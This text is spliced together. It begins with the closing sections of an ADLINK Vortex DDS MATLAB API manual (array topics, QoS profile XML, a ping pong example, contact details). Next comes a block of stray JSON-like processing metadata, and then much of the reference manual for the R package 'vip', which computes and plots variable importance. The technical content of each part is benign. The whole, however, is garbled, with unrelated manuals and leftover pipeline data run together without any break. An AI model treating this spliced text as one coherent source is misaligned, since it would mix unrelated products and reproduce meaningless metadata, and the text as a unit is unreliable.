### 5.3 Creating arrays
When defining a topic class, you can make a field map to an IDL array by initializing it to an array of the appropriate dimensions. The MATLAB API for Vortex DDS recognizes arrays of most types as identifying IDL arrays. The one exception is that arrays of MATLAB `char` are still interpreted as an IDL string.
The following example shows a topic class that defines arrays:
```matlab
classdef ArrayTopic < Vortex.AbstractType
properties
x = zeros([1 4]) %IDL: double x[4];
y int32 = zeros([3 4]) %IDL: long y[3][4];
end
methods (Static)
function keys = getKey
keys = ''; %No Key
end
end
end
```
### 5.4 Unsupported Types
When creating topics without IDL, you must accept the following restrictions:
- IDL sequences cannot be defined.
- arrays of IDL strings cannot be defined.
- bounded IDL strings cannot be defined.
QoS Provider
The following section explains how the QoS is set for a DDS entity using the QoS Provider.
6.1 QoS Provider File
Quality of Service for DDS entities is set using XML files based on the XML schema file QoSProfile.xsd. These XML files contain one or more QoS profiles for DDS entities. An example with a default QoS profile for all entity types can be found at DDS_DefaultQoS.xml.
Note: Sample QoS Profile XML files can be found in the examples directories.
6.2 QoS Profile
A QoS profile consists of a name and optionally a base_name attribute. The base_name attribute allows a QoS or a profile to inherit values from another QoS or profile in the same file. The file contains QoS elements for one or more DDS entities. A skeleton file without any QoS values is displayed below to show the structure of the file.
```xml
<dds>
<qos_profile name="DDS QoS Profile Name">
    <datareader_qos/>
    <datawriter_qos/>
    <domainparticipant_qos/>
    <subscriber_qos/>
    <publisher_qos/>
    <topic_qos/>
</qos_profile>
</dds>
```
Example: Specify Publisher Partition
The example below specifies the publisher’s partitions as A and B.
```xml
<publisher_qos>
<partition>
<name>
<element>A</element>
<element>B</element>
</name>
</partition>
</publisher_qos>
```
6.3 Setting QoS Profile in MATLAB
To set the QoS profile for a DDS entity in MATLAB the user must specify the File URI and the QoS profile name. If the file is not specified, the DDS entity will be created with the default QoS values.
```matlab
% QoS File
PINGER_QOS_FILE = '/home/dds/matlab_examples/pingpong/DDS_PingerVolatileQoS.xml';
PINGER_QOS_PROFILE = 'DDS VolatileQosProfile';

% create the pinger participant on the default domain with the specified QoS profile
dp = Vortex.DomainParticipant(['file://' PINGER_QOS_FILE], PINGER_QOS_PROFILE);
```
The file for the above would minimally contain the following `<domainparticipant_qos>` tag.
```xml
<?xml version="1.0" encoding="UTF-8"?>
<dds>
<qos_profile name="DDS VolatileQosProfile">
<domainparticipant_qos>
<user_data>
<value></value>
</user_data>
<entity_factory>
<autoenable_created_entities>true</autoenable_created_entities>
</entity_factory>
</domainparticipant_qos>
</qos_profile>
</dds>
```
Ping Pong Example
A simple ping pong example is provided to demonstrate the basic capabilities of the MATLAB DDS integration. The ping pong example can be found in the following directory:
```
OSPL_HOME/tools/matlab/examples/matlab/pingpong
```
The ping pong example creates two participants:
1. A pinger that writes to the PING partition and reads from the PONG partition.
2. A ponger that writes to the PONG partition and reads from the PING partition.
A MATLAB script is provided that writes and reads sample data in the pinger and ponger participants.
### 7.1 Example Files
Files with the .m extension are MATLAB script files.
An explanation of what each example file does is provided below.
**pingpong.idl**
- Defines the PingPongType in idl
- Used to generate the MATLAB file PingPongType.m via:
```
idlpp -l matlab pingpong.idl
```
**PingPongType.m**
- Defines a PingPongType; generated from idlpp
- The PingPongType represents a DDS topic type.
- PingPongType specifies two properties: id, count.
**DDS_PingerVolatileQoS.xml**
- XML file that specifies the DDS QoS (quality of service) settings for pinger.
**DDS_PongerVolatileQoS.xml**
- XML file that specifies the DDS QoS (quality of service) settings for ponger.
**setup_pinger.m**
- Creates the pinger participant on the default DDS domain, with specified QoS profile.
- Creates the topic PingPongType.
- Creates the publisher using the domain participant on the PING partition specified in the QoS profile.
- Creates the writer using the publisher and the specified QoS profile.
- Creates the subscriber using the domain participant on the PONG partition specified in the QoS profile.
- Creates the reader using the subscriber and the specified QoS profile.
**setup_ponger.m**
- Creates the ponger participant on the default domain with the specified QoS profile.
- Creates the topic PingPongType.
- Creates the publisher using the domain participant on the PONG partition specified in the QoS profile.
- Creates the writer using the publisher and the specified QoS profile.
- Creates the subscriber using the domain participant on the PING partition specified in the QoS profile.
- Creates the reader using the subscriber and the specified QoS profile.
**pinger_ponger.m**
- MATLAB script that writes and reads sample data in the pinger and ponger participants.
- This script calls the setup_pinger.m and setup_ponger.m scripts.
- This is the main script to run the ping pong example.
- This script is run from the MATLAB Command Window.
### 7.2 Steps to run example
1. **In the MATLAB Command Window, run `pinger_ponger.m`**:
   - Type "pinger_ponger".
   - Press Enter.
Contacts & Notices
8.1 Contacts
ADLINK Technology Corporation
400 TradeCenter
Suite 5900
Woburn, MA
01801
USA
Tel: +1 781 569 5819
ADLINK Technology Limited
The Edge
5th Avenue
Team Valley
Gateshead
NE11 0XA
UK
Tel: +44 (0)191 497 9900
ADLINK Technology SARL
28 rue Jean Rostand
91400 Orsay
France
Tel: +33 (1) 69 015354
Web: http://ist.adlinktech.com/
Contact: http://ist.adlinktech.com
E-mail: ist_info@adlinktech.com
LinkedIn: https://www.linkedin.com/company/79111/
Twitter: https://twitter.com/ADLINKTech_usa
Facebook: https://www.facebook.com/ADLINKTECH
8.2 Notices
Copyright © 2019 ADLINK Technology Limited. All rights reserved.
This document may be reproduced in whole but not in part. The information contained in this document is subject to change without notice and is made available in good faith without liability on the part of ADLINK Technology Limited. All trademarks acknowledged.
55973, null], [55973, 59743, null], [59743, 63206, null], [63206, 68518, null]], "google_gemma-3-12b-it_is_public_document": [[0, 1924, true], [1924, 5951, null], [5951, 9568, null], [9568, 13802, null], [13802, 17823, null], [17823, 20066, null], [20066, 24405, null], [24405, 27760, null], [27760, 31349, null], [31349, 35613, null], [35613, 37379, null], [37379, 40519, null], [40519, 44768, null], [44768, 48119, null], [48119, 52123, null], [52123, 55973, null], [55973, 59743, null], [59743, 63206, null], [63206, 68518, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 68518, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 68518, null]], "pdf_page_numbers": [[0, 1924, 1], [1924, 5951, 2], [5951, 9568, 3], [9568, 13802, 4], [13802, 17823, 5], [17823, 20066, 6], [20066, 24405, 7], [24405, 27760, 8], [27760, 31349, 9], [31349, 35613, 10], [35613, 37379, 11], [37379, 40519, 12], [40519, 44768, 13], [44768, 48119, 14], [48119, 52123, 15], [52123, 55973, 16], [55973, 59743, 17], [59743, 63206, 18], [63206, 68518, 19]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 68518, 0.10757]]}
|
olmocr_science_pdfs
|
2024-12-11
|
2024-12-11
|
55d20e4565a5e3b840a51b3b0d2d7a03b4ccc52e
|
Package ‘vip’
October 12, 2022
**Type** Package
**Title** Variable Importance Plots
**Version** 0.3.2
**Description** A general framework for constructing variable importance plots from various types of machine learning models in R. Aside from some standard model-specific variable importance measures, this package also provides model-agnostic approaches that can be applied to any supervised learning algorithm. These include 1) an efficient permutation-based variable importance measure, 2) variable importance based on Shapley values (Strumbelj and Kononenko, 2014) <doi:10.1007/s10115-013-0679-x>, and 3) the variance-based approach described in Greenwell et al. (2018) <arXiv:1805.04755>. A variance-based method for quantifying the relative strength of interaction effects is also included (see the previous reference for details).
**License** GPL (>= 2)
**URL** https://github.com/koalaverse/vip/
**BugReports** https://github.com/koalaverse/vip/issues
**Encoding** UTF-8
**VignetteBuilder** knitr
**LazyData** true
**Imports** ggplot2 (>= 0.9.0), gridExtra, magrittr, plyr, stats, tibble, utils
**Suggests** DT, C50, caret, Ckmeans.1d.dp, covr, Cubist, doParallel, dplyr, earth, fastshap, gbm, glmnet, h2o, htmlwidgets, keras, knitr, lattice, mlbench, mlr, mlr3, neuralnet, NeuralNetTools, nnet, parsnip, party, partykit, pdp, pls, randomForest, ranger, rmarkdown, rpart, RSNNS, sparkline, sparklyr (>= 0.8.0), tidytest, varImp, xgboost
**RoxygenNote** 7.1.1
**NeedsCompilation** no
**Author** Brandon Greenwell [aut, cre] (<https://orcid.org/0000-0002-8120-0084>), Brad Boehmke [aut] (<https://orcid.org/0000-0002-3611-8516>), Bernie Gray [aut] (<https://orcid.org/0000-0001-9190-6032>)

add_sparklines Add sparklines

**Description**
Create an HTML widget to display variable importance scores with a sparkline representation of each feature's effect (i.e., its partial dependence function).
**Usage**
```r
add_sparklines(object, fit, digits = 3, free_y = FALSE, verbose = FALSE, ...)
```
```r
# S3 method for class 'vi'
add_sparklines(object, fit, digits = 3, free_y = FALSE, verbose = FALSE, ...)
```
**Arguments**
- **object**: An object that inherits from class "vi".
- **fit**: The original fitted model. Only needed if `vi()` was not called with 'method = "firm"'.
- **digits**: Integer specifying the minimal number of significant digits to use for displaying importance scores and, if available, their standard deviations.
- **free_y**: Logical indicating whether or not the y-axis limits should be allowed to vary for each sparkline. Default is FALSE.
- **verbose**: Logical indicating whether or not to print progress. Default is FALSE.
- **...**: Additional optional arguments to be passed on to `partial`.
Value
An object of class c("datatables", "htmlwidget"); essentially, a data frame with three columns: Variable, Importance, and Effect (a sparkline representation of the partial dependence function). For "lm"/"glm"-like objects, an additional column, called Sign, is also included which includes the sign (i.e., POS/NEG) of the original coefficient.
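The manual page itself gives no example here; a hedged sketch of a typical call (the model and data below are illustrative assumptions, and the vip, DT, and sparkline packages are assumed to be installed):

```r
library(vip)

# Any supported fitted model works; a linear model keeps the sketch minimal.
fit <- lm(mpg ~ wt + hp, data = mtcars)

# Compute importance scores first, then attach sparklines of each effect.
vi_obj <- vi(fit)
add_sparklines(vi_obj, fit = fit)  # returns a "datatables"/"htmlwidget" object
```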
gen_friedman Friedman benchmark data

Description
Simulate data from the Friedman 1 benchmark problem. See mlbench.friedman1 for details and references.
Usage
gen_friedman(
  n_samples = 100,
  n_features = 10,
  n_bins = NULL,
  sigma = 0.1,
  seed = NULL
)
Arguments
n_samples Integer specifying the number of samples (i.e., rows) to generate. Default is 100.
n_features Integer specifying the number of features to generate. Default is 10.
n_bins Integer specifying the number of (roughly) equal sized bins to split the response into. Default is NULL for no binning. Setting to a positive integer > 1 effectively turns this into a classification problem where n_bins gives the number of classes.
sigma Numeric specifying the standard deviation of the noise.
seed Integer specifying the random seed. If NULL (the default) the results will be different each time the function is run.
Note
This function is mostly used for internal testing.
Examples
gen_friedman()
get_formula Extract model formula
Description
Calls \texttt{formula} to extract the formulae from various modeling objects, but returns \texttt{NULL} instead of an error for objects that do not contain a formula component.
Usage
get_formula(object)
Arguments
\texttt{object} An appropriate fitted model object.
Value
Either a \texttt{formula} object or \texttt{NULL}.
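A small usage sketch (the model choice is an arbitrary assumption; assumes the vip package is installed):

```r
library(vip)

fit <- lm(mpg ~ wt + hp, data = mtcars)
get_formula(fit)     # the model formula, mpg ~ wt + hp
get_formula(list())  # NULL rather than an error: no formula component
```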
list_metrics List metrics
Description
List all available performance metrics.
Usage
list_metrics()
Examples
```r
(metrics <- list_metrics())
metrics[metrics$Task == "Multiclass classification", ]
```
metric_mse Model metrics

**Description**
Common model/evaluation metrics for machine learning.
**Usage**
metric_mse(actual, predicted, na.rm = FALSE)
metric_rmse(actual, predicted, na.rm = FALSE)
metric_sse(actual, predicted, na.rm = FALSE)
metric_mae(actual, predicted, na.rm = FALSE)
metric_rsquared(actual, predicted, na.rm = FALSE)
metric_accuracy(actual, predicted, na.rm = FALSE)
metric_error(actual, predicted, na.rm = FALSE)
metric_auc(actual, predicted)
metric_logLoss(actual, predicted)
**Arguments**
- **actual**: Vector of actual target values.
- **predicted**: Vector of predicted target values.
- **na.rm**: Logical indicating whether or not NA values should be stripped before the computation proceeds.
**Note**
The metric_auc and metric_logLoss functions are based on code from the Metrics package.
**Examples**
```r
x <- rnorm(10)
y <- rnorm(10)
metric_mse(x, y)
metric_rsquared(x, y)
```
vi Variable importance
Compute variable importance scores for the predictors in a model.
Usage
vi(object, ...)
## Default S3 method:
vi(
object,
method = c("model", "firm", "permute", "shap"),
feature_names = NULL,
FUN = NULL,
var_fun = NULL,
ice = FALSE,
abbreviate_feature_names = NULL,
sort = TRUE,
decreasing = TRUE,
scale = FALSE,
rank = FALSE,
...
)
## S3 method for class 'model_fit'
vi(object, ...)
## S3 method for class 'WrappedModel'
vi(object, ...)
## S3 method for class 'Learner'
vi(object, ...)
Arguments
object A fitted model object (e.g., a "randomForest" object) or an object that inherits from class "vi".
... Additional optional arguments to be passed on to vi_model, vi_firm, vi_permute, or vi_shap.
method Character string specifying the type of variable importance (VI) to compute. Current options are "model" (the default), for model-specific VI scores (see vi_model for details), "firm", for variance-based VI scores (see vi_firm for details), "permute", for permutation-based VI scores (see `vi_permute` for details), or "shap", for Shapley-based VI scores. For more details on the variance-based methods, see Greenwell et al. (2018) and Scholbeck et al. (2019).
**feature_names**
Character string giving the names of the predictor variables (i.e., features) of interest.
**FUN**
Deprecated. Use `var_fun` instead.
**var_fun**
List with two components, "cat" and "con", containing the functions to use to quantify the variability of the feature effects (e.g., partial dependence values) for categorical and continuous features, respectively. If NULL, the standard deviation is used for continuous features. For categorical features, the range statistic is used (i.e., (max - min) / 4). Only applies when `method = "firm"`.
**ice**
Logical indicating whether or not to estimate feature effects using individual conditional expectation (ICE) curves. Only applies when `method = "firm"`. Default is FALSE. Setting ice = TRUE is preferred whenever strong interaction effects are potentially present.
**abbreviate_feature_names**
Integer specifying the length at which to abbreviate feature names. Default is NULL which results in no abbreviation (i.e., the full name of each feature will be printed).
**sort**
Logical indicating whether or not to sort the variable importance scores. Default is TRUE.
**decreasing**
Logical indicating whether or not the variable importance scores should be sorted in descending (TRUE) or ascending (FALSE) order of importance. Default is TRUE.
**scale**
Logical indicating whether or not to scale the variable importance scores so that the largest is 100. Default is FALSE.
**rank**
Logical indicating whether or not to rank the variable importance scores (i.e., convert to integer ranks). Default is FALSE. Potentially useful when comparing variable importance scores across different models using different methods.
**Value**
A tidy data frame (i.e., a "tibble" object) with at least two columns: Variable and Importance. For "lm"/"glm"-like objects, an additional column, called Sign, is also included which includes the sign (i.e., POS/NEG) of the original coefficient. If `method = "permute"` and `nsim > 1`, then an additional column, StDev, giving the standard deviation of the permutation-based variable importance scores is included.
**Examples**
```r
# A projection pursuit regression example
```
# Load the sample data
data(mtcars)
# Fit a projection pursuit regression model
mtcars.ppr <- ppr(mpg ~ ., data = mtcars, nterms = 1)
# Compute variable importance scores
vi(mtcars.ppr, method = "firm", ice = TRUE)
vi(mtcars.ppr, method = "firm", ice = TRUE,
var_fun = list("con" = mad, "cat" = function(x) diff(range(x)) / 4))
# Plot variable importance scores
vip(mtcars.ppr, method = "firm", ice = TRUE)
---
vint
## Interaction effects
### Description
Quantify the strength of two-way interaction effects using a simple *feature importance ranking measure* (FIRM) approach. For details, see Greenwell et al. (2018).
### Usage
```r
vint(
  object,
  feature_names,
  progress = "none",
  parallel = FALSE,
  paropts = NULL,
  ...
)
```
### Arguments
- `object`: A fitted model object (e.g., a "randomForest" object).
- `feature_names`: Character string giving the names of the two features of interest.
- `progress`: Character string giving the name of the progress bar to use while constructing the interaction statistics. See `create_progress_bar` for details. Default is "none".
- `parallel`: Logical indicating whether or not to run `partial` in parallel using a backend provided by the `foreach` package. Default is `FALSE`.
- `paropts`: List containing additional options to be passed on to `foreach` when `parallel = TRUE`.
- `...`: Additional optional arguments to be passed on to `partial`.
Details
This function quantifies the strength of interaction between features $X_1$ and $X_2$ by measuring the change in variance along slices of the partial dependence of $X_1$ and $X_2$ on the target $Y$. See Greenwell et al. (2018) for details and examples.
Examples
```r
## Not run:
#
# The Friedman 1 benchmark problem
#
#
# Load required packages
library(gbm)
library(ggplot2)
library(mlbench)
# Simulate training data
trn <- gen_friedman(500, seed = 101) # vip::gen_friedman
# NOTE: The only interaction that actually occurs in the model from which
# these data are generated is between x.1 and x.2!
#
# Fit a GBM to the training data
set.seed(102) # for reproducibility
fit <- gbm(y ~ ., data = trn, distribution = "gaussian", n.trees = 1000,
interaction.depth = 2, shrinkage = 0.01, bag.fraction = 0.8,
cv.folds = 5)
best_iter <- gbm.perf(fit, plot.it = FALSE, method = "cv")
# Quantify relative interaction strength
all_pairs <- combn(paste0("x.", 1:10), m = 2)
res <- NULL
for (i in seq_len(ncol(all_pairs))) {  # iterate over column pairs, not elements
  interact <- vint(fit, feature_names = all_pairs[, i], n.trees = best_iter)
  res <- rbind(res, interact)
}
# Plot top 20 results
top_20 <- res[1:20,]
ggplot(top_20, aes(x = reorder(Variables, Interaction), y = Interaction)) +
geom_col() +
coord_flip() +
xlab("") +
ylab("Interaction strength")
## End(Not run)
```
### vip
#### Variable importance plots
**Description**
Plot variable importance scores for the predictors in a model.
**Usage**
`vip(object, ...)`
```
## Default S3 method:
vip(
object,
num_features = 10L,
geom = c("col", "point", "boxplot", "violin"),
mapping = NULL,
aesthetics = list(),
horizontal = TRUE,
all_permutations = FALSE,
jitter = FALSE,
include_type = FALSE,
...
)
```
```
## S3 method for class 'model_fit'
vip(object, ...)
```
**Arguments**
**object**
A fitted model object (e.g., a "randomForest" object) or an object that inherits from class "vi".
**...**
Additional optional arguments to be passed on to `vi`.
**num_features**
Integer specifying the number of variable importance scores to plot. Default is 10.
**geom**
Character string specifying which type of plot to construct. The currently available options are described below.
- `geom = "col"` uses `geom_col` to construct a bar chart of the variable importance scores.
- `geom = "point"` uses `geom_point` to construct a Cleveland dot plot of the variable importance scores.
geom = "boxplot" uses `geom_boxplot` to construct a boxplot plot of the variable importance scores. This option can only for the permutation-based importance method with `nsim > 1` and `keep = TRUE`; see `vi_permute` for details.
geom = "violin" uses `geom_violin` to construct a violin plot of the variable importance scores. This option can only for the permutation-based importance method with `nsim > 1` and `keep = TRUE`; see `vi_permute` for details.
**Examples**
```r
# A projection pursuit regression example
#
# Load the sample data
data(mtcars)
# Fit a projection pursuit regression model
model <- ppr(mpg ~ ., data = mtcars, nterms = 1)
# Construct variable importance plot
vip(model, method = "firm")
# Better yet, store the variable importance scores and then plot
vi_scores <- vi(model, method = "firm")
vip(vi_scores, geom = "point", horizontal = FALSE)
# The `%T>%` operator is imported for convenience; see ?magrittr::%T>%
# for details
vi_scores <- model %T>%
  {print(vip(.))} %>%
  vi(method = "firm")
vi_scores
```
vi_firm
Variance-based variable importance
Description
Compute variance-based variable importance using a simple feature importance ranking measure (FIRM) approach; for details, see Greenwell et al. (2018) and Scholbeck et al. (2019).
Usage
vi_firm(object, ...)
## Default S3 method:
vi_firm(object, feature_names, FUN = NULL, var_fun = NULL, ice = FALSE, ...)
Arguments
object A fitted model object (e.g., a "randomForest" object).
... Additional optional arguments to be passed on to partial.
feature_names Character string giving the names of the predictor variables (i.e., features) of interest.
FUN Deprecated. Use var_fun instead.
var_fun List with two components, "cat" and "con", containing the functions to use to quantify the variability of the feature effects (e.g., partial dependence values) for categorical and continuous features, respectively. If NULL, the standard deviation is used for continuous features. For categorical features, the range statistic is used (i.e., (max - min) / 4). Only applies when method = "firm".
ice Logical indicating whether or not to estimate feature effects using individual conditional expectation (ICE) curves. Only applies when method = "firm". Default is FALSE. Setting ice = TRUE is preferred whenever strong interaction effects are potentially present.
Details
This approach to computing VI scores is based on quantifying the relative "flatness" of the effect of each feature. Feature effects can be assessed using partial dependence plots (PDPs) or individual conditional expectation (ICE) curves. These approaches are model-agnostic and can be applied to any supervised learning algorithm. By default, relative "flatness" is defined by computing the standard deviation of the y-axis values for each feature effect plot for numeric features; for categorical features, the default is to use range divided by 4. This can be changed via the `var_fun` argument. See Greenwell et al. (2018) for details and additional examples.
Value
A tidy data frame (i.e., a "tibble" object) with two columns, Variable and Importance, containing the variable name and its associated importance score, respectively.
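This entry has no Examples section; a minimal sketch under the same assumptions as the `vi()` example elsewhere in this manual (stats::ppr on mtcars; assumes vip and its pdp dependency are installed):

```r
library(vip)

# Fit a projection pursuit regression model.
fit <- ppr(mpg ~ ., data = mtcars, nterms = 1)

# Variance-based (FIRM) importance for every predictor.
vi_firm(fit, feature_names = setdiff(names(mtcars), "mpg"))
```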
---
vi_model
Model-specific variable importance
Description
Compute model-specific variable importance scores for the predictors in a model.
Usage
```r
vi_model(object, ...)
## Default S3 method:
vi_model(object, ...)
## S3 method for class 'C5.0'
vi_model(object, type = c("usage", "splits"), ...)
## S3 method for class 'train'
vi_model(object, ...)
## S3 method for class 'cubist'
vi_model(object, ...)
```

```r
## S3 method for class 'earth'
vi_model(object, type = c("nsubsets", "rss", "gcv"), ...)
## S3 method for class 'gbm'
vi_model(object, type = c("relative.influence", "permutation"), ...)
## S3 method for class 'glmnet'
vi_model(object, lambda = NULL, ...)
## S3 method for class 'cv.glmnet'
vi_model(object, lambda = NULL, ...)
## S3 method for class 'H2OBinomialModel'
vi_model(object, ...)
## S3 method for class 'H2OMultinomialModel'
vi_model(object, ...)
## S3 method for class 'H2ORegressionModel'
vi_model(object, ...)
## S3 method for class 'WrappedModel'
vi_model(object, ...)
## S3 method for class 'Learner'
vi_model(object, ...)
## S3 method for class 'nn'
vi_model(object, type = c("olden", "garson"), ...)
## S3 method for class 'nnet'
vi_model(object, type = c("olden", "garson"), ...)
## S3 method for class 'model_fit'
vi_model(object, ...)
## S3 method for class 'RandomForest'
vi_model(object, type = c("accuracy", "auc"), ...)
## S3 method for class 'constparty'
vi_model(object, ...)
## S3 method for class 'cforest'
vi_model(object, ...)
## S3 method for class 'mvr'
vi_model(object, ...)
## S3 method for class 'randomForest'
vi_model(object, ...)
## S3 method for class 'ranger'
vi_model(object, ...)
## S3 method for class 'rpart'
vi_model(object, ...)
## S3 method for class 'mlp'
vi_model(object, type = c("olden", "garson"), ...)
## S3 method for class 'ml_model_decision_tree_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_decision_tree_classification'
vi_model(object, ...)
## S3 method for class 'ml_model_gbt_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_gbt_classification'
vi_model(object, ...)
## S3 method for class 'ml_model_generalized_linear_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_linear_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_random_forest_regression'
vi_model(object, ...)
## S3 method for class 'ml_model_random_forest_classification'
vi_model(object, ...)
## S3 method for class 'lm'
vi_model(object, type = c("stat", "raw"), ...)
## S3 method for class 'xgb.Booster'
vi_model(object, type = c("gain", "cover", "frequency"), ...)
```
Arguments
- **object**: A fitted model object (e.g., a "randomForest" object).
- **...**: Additional optional arguments to be passed on to other methods.
- **type**: Character string specifying the type of variable importance to return (only used for some models). See details for which methods this argument applies to.
- **lambda**: Numeric value for the penalty parameter of a glmnet model (this is equivalent to the `s` argument in `coef.glmnet`). See the section on glmnet in the details below.
**Details**
Computes model-specific variable importance scores depending on the class of \texttt{object}:
**C5.0** Variable importance is measured by determining the percentage of training set samples that fall into all the terminal nodes after the split. For example, the predictor in the first split automatically has an importance measurement of 100 percent since all samples are affected by this split. Other predictors may be used frequently in splits, but if the terminal nodes cover only a handful of training set samples, the importance scores may be close to zero. The same strategy is applied to rule-based models and boosted versions of the model. The underlying function can also return the number of times each predictor was involved in a split by using the option \texttt{metric = "usage"}. See \texttt{C5imp} for details.
**cubist** The Cubist output contains variable usage statistics. It gives the percentage of times where each variable was used in a condition and/or a linear model. Note that this output will probably be inconsistent with the rules shown in the output from \texttt{summary.cubist}. At each split of the tree, Cubist saves a linear model (after feature selection) that is allowed to have terms for each variable used in the current split or any split above it. Quinlan (1992) discusses a smoothing algorithm where each model prediction is a linear combination of the parent and child model along the tree. As such, the final prediction is a function of all the linear models from the initial node to the terminal node. The percentages shown in the Cubist output reflects all the models involved in prediction (as opposed to the terminal models shown in the output). The variable importance used here is a linear combination of the usage in the rule conditions and the model. See \texttt{summary.cubist} and \texttt{varImp.cubist} for details.
**glmnet** Similar to (generalized) linear models, the absolute value of the coefficients are returned for a specific model. It is important that the features (and hence, the estimated coefficients) be standardized prior to fitting the model. You can specify which coefficients to return by passing the specific value of the penalty parameter via the \texttt{lambda} argument (this is equivalent to the \texttt{s} argument in \texttt{coef.glmnet}). By default, \texttt{lambda} = \texttt{NULL} and the coefficients corresponding to the final penalty value in the sequence are returned; in other words, you should ALWAYS SPECIFY \texttt{lambda}! For \texttt{"cv.glmnet"} objects, the largest value of \texttt{lambda} such that the error is within one standard error of the minimum is used by default. For \texttt{"multnet"} objects, the coefficients corresponding to the first class are used; that is, the first component of \texttt{coef.glmnet}.
**cforest** Variable importance is measured in a way similar to those computed by \texttt{importance}. Besides the standard version, a conditional version is available that adjusts for correlations between predictor variables. If \texttt{conditional = TRUE}, the importance of each variable is computed by permuting within a grid defined by the predictors that are associated (with 1 - \texttt{p}-value greater than threshold) to the variable of interest. The resulting variable importance score is conditional in the sense of beta coefficients in regression models, but represents the effect of a variable in both main effects and interactions. See Strobl et al. (2008) for details. Note, however, that all random forest results are subject to random variation. Thus, before interpreting the importance ranking, check whether the same ranking is achieved with a different random seed - or otherwise increase the number of trees \texttt{ntree} in \texttt{ctree_control}. Note that in the presence of missings in the predictor variables the procedure described in Hapfelmeier et al. (2012) is performed. See \texttt{varimp} for details.
earth The `earth` package uses three criteria for estimating the variable importance in a MARS model (see `evimp` for details):
- The `nsubsets` criterion (`type = "nsubsets"`) counts the number of model subsets that include each feature. Variables that are included in more subsets are considered more important. This is the criterion used by `summary.earth` to print variable importance. By "subsets" we mean the subsets of terms generated by `earth()`’s backward pass. There is one subset for each model size (from one to the size of the selected model) and the subset is the best set of terms for that model size. (These subsets are specified in the `$prune.terms` component of `earth()`’s return value.) Only subsets that are smaller than or equal in size to the final model are used for estimating variable importance. This is the default method used by `vip`.
- The `rss` criterion (`type = "rss"`) first calculates the decrease in the RSS for each subset relative to the previous subset during `earth()`’s backward pass. (For multiple response models, RSS’s are calculated over all responses.) Then for each variable it sums these decreases over all subsets that include the variable. Finally, for ease of interpretation the summed decreases are scaled so the largest summed decrease is 100. Variables which cause larger net decreases in the RSS are considered more important.
- The `gcv` criterion (`type = "gcv"`) is similar to the `rss` approach, but uses the GCV statistic instead of the RSS. Note that adding a variable can sometimes increase the GCV. (Adding the variable has a deleterious effect on the model, as measured in terms of its estimated predictive power on unseen data.) If that happens often enough, the variable can have a negative total importance, and thus appear less important than unused variables.
gbm Variable importance is computed using one of two approaches (See `summary.gbm` for details):
- The standard approach (`type = "relative.influence"`) described in Friedman (2001). When `distribution = "gaussian"` this returns the reduction of squared error attributable to each variable. For other loss functions this returns the reduction attributable to each variable in sum of squared error in predicting the gradient on each iteration. It describes the relative influence of each variable in reducing the loss function. This is the default method used by `vip`.
- An experimental permutation-based approach (`type = "permutation"`). This method randomly permutes each predictor variable at a time and computes the associated reduction in predictive performance. This is similar to the variable importance measures Leo Breiman uses for random forests, but `gbm` currently computes using the entire training dataset (not the out-of-bag observations).
H2OModel See `h2o.varimp` or visit [http://docs.h2o.ai/h2o/latest-stable/h2o-docs/variable-importance.html](http://docs.h2o.ai/h2o/latest-stable/h2o-docs/variable-importance.html) for details.
nnet Two popular methods for constructing variable importance scores with neural networks are the Garson algorithm (Garson 1991), later modified by Goh (1995), and the Olden algorithm (Olden et al. 2004). For both algorithms, the basis of these importance scores is the network’s connection weights. The Garson algorithm determines variable importance by identifying all weighted connections between the nodes of interest. Olden’s algorithm, on the other hand, uses the product of the raw connection weights between each input and output neuron and sums the product across all hidden neurons. This has been shown to outperform the Garson method in various simulations. For DNNs, a similar method due to Gedeon (1997) considers the weights connecting the input features to the first two hidden layers (for simplicity and speed); but this method can be slow for large networks. To implement the Olden and Garson
algorithms, use type = "olden" and type = "garson", respectively. See garson and olden for details.
lm In (generalized) linear models, variable importance is typically based on the absolute value of the corresponding \( t \)-statistics. For such models, the sign of the original coefficient is also returned. By default, type = "stat" is used; however, if the inputs have been appropriately standardized then the raw coefficients can be used with type = "raw".
ml.feature.importances The Spark ML library provides standard variable importance for tree-based methods (e.g., random forests). See ml.feature.importances for details.
randomForest Random forests typically provide two measures of variable importance. The first measure is computed from permuting out-of-bag (OOB) data: for each tree, the prediction error on the OOB portion of the data is recorded (error rate for classification and MSE for regression). Then the same is done after permuting each predictor variable. The difference between the two are then averaged over all trees in the forest, and normalized by the standard deviation of the differences. If the standard deviation of the differences is equal to 0 for a variable, the division is not done (but the average is almost always equal to 0 in that case). See importance for details, including additional arguments that can be passed via the ... argument.
The second measure is the total decrease in node impurities from splitting on the variable, averaged over all trees. For classification, the node impurity is measured by the Gini index. For regression, it is measured by residual sum of squares. See importance for details.
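Both measures can be requested through `vi_model()`, which forwards extra arguments to `importance()` via `...`; a sketch (assumes the vip and randomForest packages are installed):

```r
library(vip)
library(randomForest)

set.seed(101)  # for reproducibility
# importance = TRUE is required for the permutation-based measure
rf <- randomForest(mpg ~ ., data = mtcars, importance = TRUE)

vi_model(rf, type = 1)  # permutation-based (mean decrease in accuracy/MSE)
vi_model(rf, type = 2)  # impurity-based (decrease in node impurity)
```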
cforest Same approach described in cforest above. See varimp and varimpAUC (if type = "auc") for details.
ranger Variable importance for ranger objects is computed in the usual way for random forests. The approach used depends on the importance argument provided in the initial call to ranger. See importance for details.
